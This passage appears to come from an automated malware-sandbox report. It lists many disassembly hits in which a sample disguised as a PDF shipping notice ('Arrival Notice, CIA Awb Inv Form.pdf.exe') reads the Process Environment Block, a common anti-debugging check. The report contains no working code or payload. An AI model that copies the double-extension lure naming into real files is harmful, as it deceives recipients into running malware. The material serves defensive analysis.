Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4E62 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4E62
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAEE78 mov eax, dword ptr fs:[00000030h]	6_2_1EAAEE78
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CE70 mov eax, dword ptr fs:[00000030h]	6_2_1EA2CE70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA27E71 mov eax, dword ptr fs:[00000030h]	6_2_1EA27E71
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EDE45 mov eax, dword ptr fs:[00000030h]	6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EDE45 mov ecx, dword ptr fs:[00000030h]	6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EFE40 mov eax, dword ptr fs:[00000030h]	6_2_1E9EFE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]	6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]	6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]	6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1EE48 mov eax, dword ptr fs:[00000030h]	6_2_1EA1EE48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1E70 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1E70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]	6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]	6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6DE50 mov ecx, dword ptr fs:[00000030h]	6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]	6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]	6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h]	6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h]	6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA28FBC mov eax, dword ptr fs:[00000030h]	6_2_1EA28FBC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F4FB6 mov eax, dword ptr fs:[00000030h]	6_2_1E9F4FB6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]	6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]	6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]	6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov ecx, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]	6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1BF93 mov eax, dword ptr fs:[00000030h]	6_2_1EA1BF93
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1FAA mov eax, dword ptr fs:[00000030h]	6_2_1E9F1FAA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E9FD0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E9FD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4FFF mov eax, dword ptr fs:[00000030h]	6_2_1EAC4FFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18FFB mov eax, dword ptr fs:[00000030h]	6_2_1EA18FFB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBFC0 mov eax, dword ptr fs:[00000030h]	6_2_1E9EBFC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]	6_2_1EA71FC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAEFD3 mov eax, dword ptr fs:[00000030h]	6_2_1EAAEFD3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov ecx, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]	6_2_1EA6FFDC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DF36
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DF36
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DF36
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DF36
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F3C mov eax, dword ptr fs:[00000030h]	6_2_1EA78F3C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F3C mov eax, dword ptr fs:[00000030h]	6_2_1EA78F3C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F3C mov ecx, dword ptr fs:[00000030h]	6_2_1EA78F3C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA78F3C mov ecx, dword ptr fs:[00000030h]	6_2_1EA78F3C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0CF00 mov eax, dword ptr fs:[00000030h]	6_2_1EA0CF00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0CF00 mov eax, dword ptr fs:[00000030h]	6_2_1EA0CF00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]	6_2_1EA6FF03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]	6_2_1EA6FF03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]	6_2_1EA6FF03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]	6_2_1EA2BF0C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]	6_2_1EA2BF0C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]	6_2_1EA2BF0C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EFF30 mov edi, dword ptr fs:[00000030h]	6_2_1E9EFF30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4F1D mov eax, dword ptr fs:[00000030h]	6_2_1EAC4F1D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]	6_2_1EA30F16
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]	6_2_1EA30F16
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]	6_2_1EA30F16
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]	6_2_1EA30F16
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAEF66 mov eax, dword ptr fs:[00000030h]	6_2_1EAAEF66
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4F7C mov eax, dword ptr fs:[00000030h]	6_2_1EAC4F7C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AF72 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AF72
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA46F70 mov eax, dword ptr fs:[00000030h]	6_2_1EA46F70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]	6_2_1E9EEF79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]	6_2_1E9EEF79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]	6_2_1E9EEF79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAABF4D mov eax, dword ptr fs:[00000030h]	6_2_1EAABF4D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBF70 mov eax, dword ptr fs:[00000030h]	6_2_1E9EBF70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1F70 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1F70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAAF50 mov ecx, dword ptr fs:[00000030h]	6_2_1EAAAF50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F7C95 mov eax, dword ptr fs:[00000030h]	6_2_1E9F7C95
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F7C95 mov eax, dword ptr fs:[00000030h]	6_2_1E9F7C95
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7C85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7C85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7C85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7C85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7C85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA73C80 mov ecx, dword ptr fs:[00000030h]	6_2_1EA73C80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA99C98 mov ecx, dword ptr fs:[00000030h]	6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]	6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]	6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]	6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAFC95 mov eax, dword ptr fs:[00000030h]	6_2_1EAAFC95
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA87CE8 mov eax, dword ptr fs:[00000030h]	6_2_1EA87CE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA70CEE mov eax, dword ptr fs:[00000030h]	6_2_1EA70CEE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1ECF3 mov eax, dword ptr fs:[00000030h]	6_2_1EA1ECF3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1ECF3 mov eax, dword ptr fs:[00000030h]	6_2_1EA1ECF3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FFCC9 mov eax, dword ptr fs:[00000030h]	6_2_1E9FFCC9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6CCF0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA6CCF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E6CC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E6CC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E6CC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA26CC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA26CC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29CCF mov eax, dword ptr fs:[00000030h]	6_2_1EA29CCF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7CF1 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7CF1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3CF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3CF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3CF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3CF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DCD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DCD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA0DCD1
